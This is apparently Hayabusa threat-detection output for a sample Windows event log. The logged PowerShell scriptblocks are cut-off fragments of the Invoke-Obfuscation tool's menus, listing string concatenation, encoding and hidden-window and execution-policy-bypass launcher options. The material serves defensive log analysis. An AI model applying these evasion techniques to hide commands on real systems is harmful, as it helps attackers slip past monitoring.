&& PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. 
<.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
